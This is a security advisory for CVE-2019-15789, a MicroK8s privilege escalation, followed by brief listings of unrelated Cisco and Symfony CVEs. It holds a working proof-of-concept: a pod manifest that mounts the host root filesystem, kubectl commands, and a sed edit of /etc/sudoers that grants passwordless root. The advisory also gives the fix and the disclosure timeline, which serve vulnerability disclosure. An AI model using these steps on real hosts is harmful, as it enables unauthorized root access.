Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

Overview :
Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.

MICROK8S – PRIVILEGE ESCALATION (CVE-2019-15789)

Sep 10 2019

MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (eg, through sudo or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing the a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.

CVE-2019-15789

Description
MicroK8s prior to v1.15.3 included a privilege escalation vulnerability,
allowing a low privilege user to obtain root access to the host. MicroK8s
allowed any user with access to the host to administer the underlying
Kubernetes installation, including deploy pods. This allowed an attacker
with local access to provision a privileged container and gain root access
to the underlying host.
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15789
https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation
https://discuss.kubernetes.io/t/explicit-use-of-sudo-in-microk8s-cli/7605

Common Vulnerabilityies and Exposures

Contact us to get started

CVE-2024-20418 : CISCO IOS XE CONTROLLER WEB-BASED MANAGEMENT INTERFACE COMMAND INJECTION

CVE-2024-20418 : CISCO IOS XE CONTROLLER WEB-BASED MANAGEMENT INTERFACE COMMAND INJECTION

Description A vulnerability in the web-based management interface of Cisco Unified Industrial Wireless Software for Cisco Ultra-Reliable Wireless Backhaul (URWB)

CVE-2024-20536 : CISCO DATA CENTER NETWORK MANAGER 12.1.2E/12.1.2P/12.1.3B WEB-BASED MANAGEMENT INTERFACE/REST API ENDPOINT SQL INJECTION

CVE-2024-20536 : CISCO DATA CENTER NETWORK MANAGER 12.1.2E/12.1.2P/12.1.3B WEB-BASED MANAGEMENT INTERFACE/REST API ENDPOINT SQL INJECTION

Description A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could

CVE-2024-50340 : SYMFONY INJECTION

CVE-2024-50340 : SYMFONY INJECTION

Description symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the